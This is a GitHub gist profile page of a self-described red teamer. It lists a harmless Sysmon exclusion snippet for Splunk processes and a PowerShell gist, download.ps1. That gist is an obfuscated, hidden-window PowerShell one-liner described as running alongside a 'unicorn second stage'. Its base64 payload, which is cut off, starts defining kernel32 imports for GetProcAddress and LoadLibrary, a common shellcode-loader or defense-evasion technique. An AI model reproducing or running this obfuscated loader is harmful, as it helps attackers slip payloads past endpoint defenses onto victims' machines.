SecurityShrimp f8al

Red Teamer and security researcher Ex Splunk security architect for the largest non-government Splunk cluster in the world.

53 followers · 9 following

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

f8al / splunk.xml

Created October 30, 2018 14:19

images to add to sysmon configs to avoid logging loops when using splunk

	<!-- SECTION: Splunk-->
	<!--COMMENT: without omitting the splunkd image from a universal forwarder or full installation, you will get a log loop from connection logging, logging everytime the forwarder sends logs to an indexer on 9997, and then logging the connection it made to send the log, over and over, its turtles all the way down.-->
	<Image condition="is">C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe</Image><!--Splunk Universal Forwarder-->
	<Image condition="is">C:\Program Files\Splunk\bin\splunkd.exe</Image><!--Splunk daemon-->
	<Image condition="is">C:\Program Files (x86)\SplunkUniversalForwarder\bin\splunkd.exe</Image><!--Splunk Universal Forwarder-->
	<Image condition="is">C:\Program Files (x86)\Splunk\bin\splunkd.exe</Image><!--Splunk daemon-->

f8al / download.ps1

Created July 21, 2021 15:46

# ss code - run in same process as unicorn second stage

powershell /w 1 /C "sv cPW -;sv Kt ec;sv kmi ((gv cPW).value.toString()+(gv Kt).value.toString());powershell (gv kmi).value.toString() ('JABIAHQARgBqAFIAYgBKAHEAIAA9ACAAQAAiAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AHAAdQBiAGwAaQBjACAAYwBsAGEAcwBzACAAVwBpAG4AMwAyACAAewBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrACIAKwAiAGUAIgArACIAcgBuAGUAbAAzADIAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABHAGUAdABQAHIAbwBjAEEAZABkAHIAZQBzAHMAKABJAG4AdABQAHQAcgAgAGgATQBvAGQAdQBsAGUALAAgAHMAdAByAGkAbgBnACAAcAByAG8AYwBOAGEAbQBlACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrACIAKwAiAGUAIgArACIAcgBuAGUAbAAzADIAIgApAF0AIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEwAbwBhAGQATABpAGIAcgBhAHIAeQAoAHMAdAByAGkAbgBnACAAbgBhAG0AZQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawAiACsAIgBlACIAKwAiAHIAbgBlAGwAMwAyACIAKQBdACAAcAB1AGIAbABpAGMAIABzAHQ

f8al / foo.html

Last active June 25, 2024 23:53